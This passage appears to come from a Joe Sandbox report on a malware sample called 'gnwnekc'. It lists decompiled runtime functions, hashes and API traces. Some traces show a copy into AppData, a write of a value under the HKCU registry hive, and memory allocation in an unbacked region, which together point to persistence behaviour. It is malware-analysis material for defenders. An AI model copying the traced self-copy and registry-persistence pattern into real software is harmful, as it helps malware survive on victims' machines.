0x0040bbf6
0x0040bbfb
0x0040bbfe
0x0040bc05
0x00000000
0x0040bc05
0x0040bbcf
0x0040bbcf
0x0040bbd4
0x0040bbd4
0x0040bbda
0x0040bbdc
0x00000000
0x0040bbe1

APIs

Part of subcall function 0040BF88: CreateFileW.KERNELBASE(00000000,00000000,?,0040BC46,?,?,00000000), ref: 0040BFA5

GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040BCB1
__dosmaperr.LIBCMT ref: 0040BCB8
GetFileType.KERNELBASE ref: 0040BCC4
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040BCCE
__dosmaperr.LIBCMT ref: 0040BCD7
CloseHandle.KERNEL32(00000000), ref: 0040BCF7
CloseHandle.KERNEL32(00000000), ref: 0040BE44
GetLastError.KERNEL32 ref: 0040BE76
__dosmaperr.LIBCMT ref: 0040BE7D

Memory Dump Source

Source File: 00000006.00000002.914142010.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.914128831.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.914164339.000000000040F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.914176314.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_gnwnekc.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID:
API String ID: 4237864984-0
Opcode ID: 45629e90775f591bafbeb9ee62869eb8d2f91baf2a7f4dc583b7b4e1073450fb
Instruction ID: cfb52e5c3737196cb13edf7891f30d5e8dac6b504468cfecf0e5fd7ca7dd3ec8
Opcode Fuzzy Hash: 45629e90775f591bafbeb9ee62869eb8d2f91baf2a7f4dc583b7b4e1073450fb
Instruction Fuzzy Hash: EEA12332A041449FCF199F68DC41BAE3BA0EF46324F18416EE811BB3D1DB399812CB9D

Uniqueness

Uniqueness Score: -1.00%

Function 003C1588 Relevance: 10.7, APIs: 7, Instructions: 194
filememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,?,?,?,?,003C1E1E,7FAB7E30), ref: 003C164E
VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,003C1E1E,7FAB7E30,003C1ADC,00000000,00000040), ref: 003C1678
ReadFile.KERNELBASE(00000000,00000000,0000000E,7FAB7E30,00000000,?,?,?,?,?,?,?,003C1E1E,7FAB7E30,003C1ADC,00000000), ref: 003C168F
VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,003C1E1E,7FAB7E30,003C1ADC,00000000,00000040), ref: 003C16B1
CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,003C1E1E,7FAB7E30,003C1ADC,00000000,00000040,?,00000000,0000000E), ref: 003C1723
VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,003C1E1E,7FAB7E30,003C1ADC,00000000,00000040,?), ref: 003C172E
VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,003C1E1E,7FAB7E30,003C1ADC,00000000,00000040,?), ref: 003C1779

Memory Dump Source

Source File: 00000006.00000002.914080499.00000000003C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3c0000_gnwnekc.jbxd

Similarity

API ID: Virtual$AllocFileFree$CloseCreateHandleRead
String ID:
API String ID: 721982790-0
Opcode ID: 71bdb3f92817d1b0b92116cea085a9d4a3567609de8c54469bffbcc822d1f83c
Instruction ID: 14e6c3b5ffa3d1e165bae90451b38dc47ffae67764d205beb50548bcc6f64644
Opcode Fuzzy Hash: 71bdb3f92817d1b0b92116cea085a9d4a3567609de8c54469bffbcc822d1f83c
Instruction Fuzzy Hash: 3D519C71E00318EBDB229FB4DC85FAEB7B8AF0A710F11411AF951FB281E6749D419B64

Uniqueness

Uniqueness Score: -1.00%

Function 003C020A Relevance: 10.6, APIs: 7, Instructions: 147
filememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PathFileExistsW.SHLWAPI(?), ref: 003C02E1
CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 003C02FF
VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 003C0324
ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 003C0336
CloseHandle.KERNELBASE(00000000), ref: 003C033E
CreateFileW.KERNELBASE(?,40000000,00000007,00000000,00000001,00000080,00000000), ref: 003C0354
WriteFile.KERNELBASE(00000000,?,00000000,?,00000000), ref: 003C0363

Memory Dump Source

Source File: 00000006.00000002.914080499.00000000003C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3c0000_gnwnekc.jbxd

Similarity

API ID: File$Create$AllocCloseExistsHandlePathReadVirtualWrite
String ID:
API String ID: 1383296624-0
Opcode ID: e8af375a62a67367dd6a7673c85b47b54d02db1bab8b56e9b7736464bc87bfa5
Instruction ID: 0f7906ff0272764bfee33a533a5e34731fe1637f1ec728e922e042ff208d804a
Opcode Fuzzy Hash: e8af375a62a67367dd6a7673c85b47b54d02db1bab8b56e9b7736464bc87bfa5
Instruction Fuzzy Hash: 16419A75A04288BAEB21AFF4EC55FAEBA78EF44750F11451EF940FA190E7748E408768

Uniqueness

Uniqueness Score: -1.00%

Function 004049ED Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004049ED(void* __ecx, signed int* _a4, intOrPtr _a8) {
				signed int* _v8;
				void** _t12;
				void* _t13;
				void* _t16;
				void* _t18;
				signed int _t22;
				WCHAR* _t23;
				void** _t26;
				signed int* _t29;
				void* _t32;
				void* _t34;

				_t29 = _a4;
				while(_t29 != _a8) {
					_t22 =  *_t29;
					_t12 = 0x416f28 + _t22 * 4;
					_t32 =  *_t12;
					_v8 = _t12;
					if(_t32 == 0) {
						_t23 =  *(0x40f588 + _t22 * 4);
						_t13 = LoadLibraryExW(_t23, 0, 0x800); // executed
						_t32 = _t13;
						if(_t32 != 0) {
							L12:
							_t26 = _v8;
							 *_t26 = _t32;
							if( *_t26 != 0) {
								FreeLibrary(_t32);
							}
							L14:
							if(_t32 != 0) {
								_t16 = _t32;
								L18:
								return _t16;
							}
							L15:
							_t29 =  &(_t29[1]);
							continue;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L9:
							_t32 = 0;
							L10:
							if(_t32 != 0) {
								goto L12;
							}
							 *_v8 = _t18 | 0xffffffff;
							goto L15;
						}
						_t18 = E00406CEF(_t23, L"api-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = E00406CEF(_t23, L"ext-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = LoadLibraryExW(_t23, _t32, _t32);
						_t32 = _t18;
						goto L10;
					}
					if(_t32 == 0xffffffff) {
						goto L15;
					}
					goto L14;
				}
				_t16 = 0;
				goto L18;
			}

0x004049f6
0x00404aa0
0x004049fe
0x00404a00
0x00404a07
0x00404a09
0x00404a0f
0x00404a1c
0x00404a2b
0x00404a31
0x00404a35
0x00404a87
0x00404a87
0x00404a8c
0x00404a90
0x00404a93
0x00404a93
0x00404a99
0x00404a9b
0x00404ab0
0x00404aab
0x00404aaf
0x00404aaf
0x00404a9d
0x00404a9d
0x00000000
0x00404a9d
0x00404a37
0x00404a40
0x00404a77
0x00404a77
0x00404a79
0x00404a7b
0x00000000
0x00000000
0x00404a83
0x00000000
0x00404a83
0x00404a4a
0x00404a4f
0x00404a54
0x00000000
0x00000000
0x00404a5e
0x00404a63
0x00404a68
0x00000000
0x00000000
0x00404a6d
0x00404a73
0x00000000
0x00404a73
0x00404a14
0x00000000
0x00000000
0x00000000
0x00404a1a
0x00404aa9
0x00000000

Strings

api-ms-, xrefs: 00404A44
ext-ms-, xrefs: 00404A58

Memory Dump Source

Source File: 00000006.00000002.914142010.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.914128831.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.914164339.000000000040F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.914176314.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_gnwnekc.jbxd

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: b6220ee0a9f134539174d2808857bd9bdcb20b393848666b1808fb3e004fd086
Instruction ID: d11d37cf1a039867f00753cdb3131f2debf15eb93fd35a329ae7531e128b8952
Opcode Fuzzy Hash: b6220ee0a9f134539174d2808857bd9bdcb20b393848666b1808fb3e004fd086
Instruction Fuzzy Hash: 6E2108B1B85215A7C7318BA49C40E6B37689B80764F250137EE16B73D1D738ED008DEC

Uniqueness

Uniqueness Score: -1.00%

Function 003C08EF Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 425
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

D, xrefs: 003C0929

Memory Dump Source

Source File: 00000006.00000002.914080499.00000000003C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3c0000_gnwnekc.jbxd

Similarity

API ID:
String ID: D
API String ID: 0-2746444292
Opcode ID: 6fcbff0203222843f7623c16114e97a3cbe0aed4d9c765b0a886f87cb29d80d7
Instruction ID: c68655caa863a93d262b859171e51c813ef9ad0cbc343ae9198dcd45177c9f4a
Opcode Fuzzy Hash: 6fcbff0203222843f7623c16114e97a3cbe0aed4d9c765b0a886f87cb29d80d7
Instruction Fuzzy Hash: 7002C070A00259EFDB1ADFA8CD85FADBBB9BF04305F204159E515EA2A1D774AE80DF10

Uniqueness

Uniqueness Score: -1.00%

Function 0040580D Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 100
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 61%

			E0040580D(signed int __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, char _a8, char _a12, void* _a16) {
				void* _v5;
				char _v12;
				char _v16;
				char* _v20;
				char _v24;
				void* __ebp;
				char _t39;
				signed int _t44;
				char _t48;
				char _t51;
				char _t58;
				signed int _t64;
				void* _t75;
				void* _t80;
				signed int _t85;

				_t78 = __edx;
				_push(_a16);
				_push(_a12);
				L0040576D(__ebx, __edx, __edi, __esi, __eflags);
				_t39 = E00405697(__eflags, _a4);
				_v16 = _t39;
				if(_t39 !=  *((intOrPtr*)( *(_a12 + 0x48) + 4))) {
					_push(__ebx);
					_push(__esi);
					_push(__edi);
					_t80 = E004069B7(0x220);
					_t64 = __ebx | 0xffffffff;
					__eflags = _t80;
					if(__eflags == 0) {
						L5:
						_t85 = _t64;
					} else {
						_t80 = memcpy(_t80,  *(_a12 + 0x48), 0x88 << 2);
						 *_t80 =  *_t80 & 0x00000000; // executed
						_t44 = E004054A4(_t78, __eflags, _v16, _t80); // executed
						_t85 = _t44;
						__eflags = _t85 - _t64;
						if(__eflags != 0) {
							__eflags = _a8;
							if(_a8 == 0) {
								E004026C6();
							}
							asm("lock xadd [eax], ebx");
							_t66 = _t64 == 1;
							__eflags = _t64 == 1;
							if(_t64 == 1) {
								_t58 = _a12;
								__eflags =  *((intOrPtr*)(_t58 + 0x48)) - 0x416070;
								if( *((intOrPtr*)(_t58 + 0x48)) != 0x416070) {
									E00405BB5( *((intOrPtr*)(_t58 + 0x48)));
								}
							}
							 *_t80 = 1;
							_t75 = _t80;
							_t80 = 0;
							 *(_a12 + 0x48) = _t75;
							_t48 = _a12;
							__eflags =  *(_t48 + 0x350) & 0x00000002;
							if(( *(_t48 + 0x350) & 0x00000002) == 0) {
								__eflags =  *0x416760 & 0x00000001;
								if(__eflags == 0) {
									_v24 =  &_a12;
									_v20 =  &_a16;
									_t51 = 5;
									_v16 = _t51;
									_v12 = _t51;
									_push( &_v16);
									_push( &_v24);
									_push( &_v12);
									E00405B68(_t66, 0, _t85, __eflags);
									__eflags = _a8;
									if(_a8 != 0) {
										 *0x41664c =  *_a16;
									}
								}
							}
						} else {
							 *((intOrPtr*)(E004065F6(__eflags))) = 0x16;
							goto L5;
						}
					}
					E00405BB5(_t80);
					return _t85;
				} else {
					return 0;
				}
			}

0x0040580d
0x00405815
0x00405818
0x0040581b
0x00405823
0x0040582e
0x00405837
0x0040583d
0x0040583e
0x0040583f
0x0040584a
0x0040584c
0x00405850
0x00405852
0x00405882
0x00405882
0x00405854
0x00405861
0x00405867
0x0040586a
0x0040586f
0x00405873
0x00405875
0x00405892
0x00405896
0x00405898
0x00405898
0x004058a3
0x004058a7
0x004058a7
0x004058a8
0x004058aa
0x004058ad
0x004058b4
0x004058b9
0x004058be
0x004058b4
0x004058bf
0x004058c5
0x004058ca
0x004058cc
0x004058cf
0x004058d2
0x004058d9
0x004058db
0x004058e2
0x004058e7
0x004058f2
0x004058f5
0x004058f6
0x004058f9
0x004058ff
0x00405903
0x00405907
0x00405908
0x0040590d
0x00405911
0x0040591c
0x0040591c
0x00405911
0x004058e2
0x00405877
0x0040587c
0x00000000
0x0040587c
0x00405875
0x00405885
0x00405891
0x00405839
0x0040583c
0x0040583c

APIs

Part of subcall function 00405697: GetOEMCP.KERNEL32(00000000,00405828,0040A93B,00000000,?,?,00000000,?,0040A93B), ref: 004056C2

_free.LIBCMT ref: 00405885

Strings

p`A, xrefs: 004058AD
p`A, xrefs: 004057C1

Memory Dump Source

Source File: 00000006.00000002.914142010.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.914128831.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.914164339.000000000040F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.914176314.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_gnwnekc.jbxd

Similarity

API ID: _free
String ID: p`A$p`A
API String ID: 269201875-65289070
Opcode ID: 02d44d9cf6e9cd66804d7e475b15fb19ef90afa2a6ed203f9cc2e638560ba592
Instruction ID: ea908fc2568cb6fc0554f2d5d4afde984d485e60a8e966f3251c86de008d5ace
Opcode Fuzzy Hash: 02d44d9cf6e9cd66804d7e475b15fb19ef90afa2a6ed203f9cc2e638560ba592
Instruction Fuzzy Hash: 8E31BF72800649AFDF11EF69C840A9B77B4EF40318F15807AEC11AB2E1E7799D50CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00409FCC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00409FCC(WCHAR* _a4) {
				struct HINSTANCE__* _t4;

				_t4 = LoadLibraryExW(_a4, 0, 0x800); // executed
				if(_t4 != 0) {
					return _t4;
				} else {
					if(GetLastError() != 0x57 || E00406CEF(_a4, L"api-ms-", 7) == 0) {
						return 0;
					}
					return LoadLibraryExW(_a4, 0, 0);
				}
			}

0x00409fd9
0x00409fe1
0x0040a016
0x00409fe3
0x00409fec
0x00000000
0x0040a013
0x0040a012
0x0040a012

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,?,0040A068,00000000,?,00416F08,?,?,?,00409F9F,00000004,InitializeCriticalSectionEx,00410168,00410170), ref: 00409FD9
GetLastError.KERNEL32(?,0040A068,00000000,?,00416F08,?,?,?,00409F9F,00000004,InitializeCriticalSectionEx,00410168,00410170,00000000,?,004043D0), ref: 00409FE3
LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 0040A00B

Strings

api-ms-, xrefs: 00409FF0

Memory Dump Source

Source File: 00000006.00000002.914142010.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.914128831.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.914164339.000000000040F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.914176314.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_gnwnekc.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: 330103864292c38523944cc39d1b8cbd238b6e507625830c5bac9fc5190fb34d
Instruction ID: d7bd6bb98b8eac7eacc4a937879fcff55edfd1e4df5093e885237fb967068a59
Opcode Fuzzy Hash: 330103864292c38523944cc39d1b8cbd238b6e507625830c5bac9fc5190fb34d
Instruction Fuzzy Hash: 94E0123034430CB6EB201F91EC0AB993A589B90B45F104036F91CBC1E1D775E960954D

Uniqueness

Uniqueness Score: -1.00%

Function 003C0422 Relevance: 6.4, APIs: 4, Instructions: 391
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 003C0794

Part of subcall function 003C037C: PathFileExistsW.SHLWAPI(?), ref: 003C0406
Part of subcall function 003C037C: CreateDirectoryW.KERNELBASE(?,00000000), ref: 003C0412

Part of subcall function 003C020A: PathFileExistsW.SHLWAPI(?), ref: 003C02E1
Part of subcall function 003C020A: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 003C02FF

RegGetValueW.KERNEL32(80000001,?,?,0000FFFF,00000000,00000000,00000000), ref: 003C0875
RegOpenKeyExW.KERNEL32(80000001,?,00000000,00020006,?), ref: 003C0891
RegSetValueExW.KERNEL32(?,?,00000000,00000001,?,00000103), ref: 003C08CF

Memory Dump Source

Source File: 00000006.00000002.914080499.00000000003C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3c0000_gnwnekc.jbxd

Similarity

API ID: FilePath$CreateExistsValue$DirectoryFolderOpen
String ID:
API String ID: 609136486-0
Opcode ID: 0d883c9af3d01ddd46bdeb3ed83b6a0b58d92d35368ae9faeefab95d18a55217
Instruction ID: 06a161aedb5d3d615fc17bbc085c90e8ea5d0bea4fc6bf0b1576c437f5473a01
Opcode Fuzzy Hash: 0d883c9af3d01ddd46bdeb3ed83b6a0b58d92d35368ae9faeefab95d18a55217
Instruction Fuzzy Hash: 1CD14E21E54358E9EB20DBF0DC41FAEB778EF14750F10549BE608EB190E7B54E848B6A

Uniqueness

Uniqueness Score: -1.00%

Function 0040A228 Relevance: 4.7, APIs: 3, Instructions: 199
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 60%

			E0040A228(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				intOrPtr _v12;
				void* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t41;
				signed int _t49;
				void* _t51;
				void* _t53;
				signed int _t55;
				intOrPtr _t63;
				intOrPtr _t69;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr _t86;
				void* _t89;
				intOrPtr* _t91;
				intOrPtr _t93;
				void* _t94;
				void* _t95;
				signed int _t96;
				void* _t97;
				intOrPtr* _t98;
				intOrPtr* _t100;
				void* _t103;

				_push(__ecx);
				_push(__ecx);
				_t41 =  *0x416010; // 0x2fe432c7
				_v8 = _t41 ^ _t96;
				_t93 = _a20;
				if(_t93 > 0) {
					_t69 = E0040C650(_a16, _t93);
					_t103 = _t69 - _t93;
					_t4 = _t69 + 1; // 0x1
					_t93 = _t4;
					if(_t103 >= 0) {
						_t93 = _t69;
					}
				}
				_t88 = _a32;
				if(_a32 == 0) {
					_t88 =  *((intOrPtr*)( *_a4 + 8));
					_a32 =  *((intOrPtr*)( *_a4 + 8));
				}
				_t86 = E00406E9A(_t88, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t93, 0, 0);
				_t98 = _t97 + 0x18;
				_v12 = _t86;
				if(_t86 == 0) {
					L39:
					_pop(_t89);
					_pop(_t94);
					_pop(_t71);
					return E00401C35(_t46, _t71, _v8 ^ _t96, _t86, _t89, _t94);
				} else {
					_t17 = _t86 + _t86 + 8; // 0x8
					asm("sbb eax, eax");
					_t49 = _t86 + _t86 & _t17;
					if(_t49 == 0) {
						_t72 = 0;
						L15:
						if(_t72 == 0) {
							L37:
							_t95 = 0;
							L38:
							E00406D77(_t72);
							_t46 = _t95;
							goto L39;
						}
						_t51 = E00406E9A(_t88, 1, _a16, _t93, _t72, _t86);
						_t100 = _t98 + 0x18;
						if(_t51 == 0) {
							goto L37;
						}
						_t90 = _v12;
						_t53 = E0040491F(_a8, _a12, _t72, _v12, 0, 0, 0, 0, 0); // executed
						_t95 = _t53;
						if(_t95 == 0) {
							goto L37;
						}
						_t86 = 0x400;
						if((_a12 & 0x00000400) == 0) {
							_t31 = _t95 + _t95 + 8; // 0x8
							asm("sbb eax, eax");
							_t55 = _t95 + _t95 & _t31;
							if(_t55 == 0) {
								_t91 = 0;
								L31:
								if(_t91 == 0 || E0040491F(_a8, _a12, _t72, _v12, _t91, _t95, 0, 0, 0) == 0) {
									L36:
									E00406D77(_t91);
									goto L37;
								} else {
									_push(0);
									_push(0);
									if(_a28 != 0) {
										_push(_a28);
										_push(_a24);
									} else {
										_push(0);
										_push(0);
									}
									_push(_t95);
									_push(_t91);
									_push(0);
									_push(_a32);
									_t95 = E00407C7F();
									if(_t95 != 0) {
										E00406D77(_t91);
										goto L38;
									} else {
										goto L36;
									}
								}
							}
							if(_t55 > 0x400) {
								_t91 = E004069B7(_t55);
								if(_t91 == 0) {
									goto L36;
								}
								 *_t91 = 0xdddd;
								L29:
								_t91 = _t91 + 8;
								goto L31;
							}
							E0040B130(_t55);
							_t91 = _t100;
							if(_t91 == 0) {
								goto L36;
							}
							 *_t91 = 0xcccc;
							goto L29;
						}
						_t63 = _a28;
						if(_t63 == 0) {
							goto L38;
						}
						if(_t95 > _t63) {
							goto L37;
						}
						_t95 = E0040491F(_a8, _a12, _t72, _t90, _a24, _t63, 0, 0, 0);
						if(_t95 != 0) {
							goto L38;
						}
						goto L37;
					}
					if(_t49 > 0x400) {
						_t72 = E004069B7(_t49);
						if(_t72 == 0) {
							L13:
							_t86 = _v12;
							goto L15;
						}
						 *_t72 = 0xdddd;
						L12:
						_t72 = _t72 + 8;
						goto L13;
					}
					E0040B130(_t49);
					_t72 = _t98;
					if(_t72 == 0) {
						goto L13;
					}
					 *_t72 = 0xcccc;
					goto L12;
				}
			}

0x0040a22d
0x0040a22e
0x0040a22f
0x0040a236
0x0040a23b
0x0040a241
0x0040a247
0x0040a24d
0x0040a250
0x0040a250
0x0040a253
0x0040a255
0x0040a255
0x0040a253
0x0040a257
0x0040a25c
0x0040a263
0x0040a266
0x0040a266
0x0040a287
0x0040a289
0x0040a28c
0x0040a291
0x0040a3ef
0x0040a3f2
0x0040a3f3
0x0040a3f4
0x0040a400
0x0040a297
0x0040a29a
0x0040a29f
0x0040a2a1
0x0040a2a3
0x0040a2da
0x0040a2dc
0x0040a2de
0x0040a3e4
0x0040a3e4
0x0040a3e6
0x0040a3e7
0x0040a3ed
0x00000000
0x0040a3ed
0x0040a2ed
0x0040a2f2
0x0040a2f7
0x00000000
0x00000000
0x0040a2fd
0x0040a30f
0x0040a314
0x0040a318
0x00000000
0x00000000
0x0040a31e
0x0040a326
0x0040a363
0x0040a368
0x0040a36a
0x0040a36c
0x0040a39d
0x0040a39f
0x0040a3a1
0x0040a3dd
0x0040a3de
0x00000000
0x0040a3be
0x0040a3c0
0x0040a3c1
0x0040a3c5
0x0040a401
0x0040a404
0x0040a3c7
0x0040a3c7
0x0040a3c8
0x0040a3c8
0x0040a3c9
0x0040a3ca
0x0040a3cb
0x0040a3cc
0x0040a3d4
0x0040a3db
0x0040a40a
0x00000000
0x00000000
0x00000000
0x00000000
0x0040a3db
0x0040a3a1
0x0040a370
0x0040a38b
0x0040a390
0x00000000
0x00000000
0x0040a392
0x0040a398
0x0040a398
0x00000000
0x0040a398
0x0040a372
0x0040a377
0x0040a37b
0x00000000
0x00000000
0x0040a37d
0x00000000
0x0040a37d
0x0040a328
0x0040a32d
0x00000000
0x00000000
0x0040a335
0x00000000
0x00000000
0x0040a351
0x0040a355
0x00000000
0x00000000
0x00000000
0x0040a35b
0x0040a2aa
0x0040a2c5
0x0040a2ca
0x0040a2d5
0x0040a2d5
0x00000000
0x0040a2d5
0x0040a2cc
0x0040a2d2
0x0040a2d2
0x00000000
0x0040a2d2
0x0040a2ac
0x0040a2b1
0x0040a2b5
0x00000000
0x00000000
0x0040a2b7
0x00000000
0x0040a2b7

APIs

__freea.LIBCMT ref: 0040A3DE

Part of subcall function 004069B7: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,0040B9FC,?,00000000,?,00407C5B,?,00000004,00000000,?,?,?,00402C6D), ref: 004069E9

__freea.LIBCMT ref: 0040A3E7
__freea.LIBCMT ref: 0040A40A

Memory Dump Source

Source File: 00000006.00000002.914142010.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.914128831.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.914164339.000000000040F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.914176314.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_gnwnekc.jbxd

Similarity

API ID: __freea$AllocateHeap
String ID:
API String ID: 2243444508-0
Opcode ID: 98ed8fb06fbf07bbe753fe517fd8d48446171f5b9103d11e8c1d95a03c05329b
Instruction ID: 77cd93b2ce3072163f2ea3b1e109bb15a50019cebf6d2acaf028941ef4fd17c0
Opcode Fuzzy Hash: 98ed8fb06fbf07bbe753fe517fd8d48446171f5b9103d11e8c1d95a03c05329b
Instruction Fuzzy Hash: A151D472600306ABDB209F65CC81EAB36A9EF84754F15413FFD05B72C0E779DC2196AA

Uniqueness

Uniqueness Score: -1.00%

Function 00409D26 Relevance: 4.5, APIs: 3, Instructions: 49
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 90%

			E00409D26(void* __ecx, void* __eflags, signed int _a4, union _LARGE_INTEGER _a8, union _LARGE_INTEGER* _a12, intOrPtr _a16) {
				signed int _v8;
				void* _v12;
				void* _t15;
				int _t16;
				signed int _t19;
				intOrPtr _t28;
				signed int _t32;
				signed int _t33;
				signed int _t36;
				signed int _t39;

				_t36 = _a4;
				_push(_t32);
				_t15 = E00408141(_t36);
				_t33 = _t32 | 0xffffffff;
				_t41 = _t15 - _t33;
				if(_t15 != _t33) {
					_push(_a16);
					_t16 = SetFilePointerEx(_t15, _a8, _a12,  &_v12); // executed
					__eflags = _t16;
					if(_t16 != 0) {
						__eflags = (_v12 & _v8) - _t33;
						if((_v12 & _v8) == _t33) {
							goto L2;
						} else {
							_t19 = _v12;
							_t39 = (_t36 & 0x0000003f) * 0x38;
							_t28 =  *((intOrPtr*)(0x417158 + (_t36 >> 6) * 4));
							_t11 = _t28 + _t39 + 0x28;
							 *_t11 =  *(_t28 + _t39 + 0x28) & 0x000000fd;
							__eflags =  *_t11;
						}
					} else {
						E0040661C(GetLastError());
						goto L2;
					}
				} else {
					 *((intOrPtr*)(E004065F6(_t41))) = 9;
					L2:
					_t19 = _t33;
				}
				return _t19;
			}

0x00409d2e
0x00409d31
0x00409d33
0x00409d38
0x00409d3c
0x00409d3e
0x00409d51
0x00409d5f
0x00409d65
0x00409d67
0x00409d80
0x00409d82
0x00000000
0x00409d84
0x00409d84
0x00409d8f
0x00409d92
0x00409d99
0x00409d99
0x00409d99
0x00409d99
0x00409d69
0x00409d70
0x00000000
0x00409d75
0x00409d40
0x00409d45
0x00409d4b
0x00409d4b
0x00409d4d
0x00409da1

APIs

SetFilePointerEx.KERNELBASE(00000000,?,00000002,?,00000000), ref: 00409D5F
GetLastError.KERNEL32(?,00409C15,?,?,00000002,00000000,?,0040A715,00000001,00000000,00000000,00000002,?,?,?,00406488), ref: 00409D69
__dosmaperr.LIBCMT ref: 00409D70

Memory Dump Source

Source File: 00000006.00000002.914142010.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.914128831.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.914164339.000000000040F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.914176314.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_gnwnekc.jbxd

Similarity

API ID: ErrorFileLastPointer__dosmaperr
String ID:
API String ID: 2336955059-0
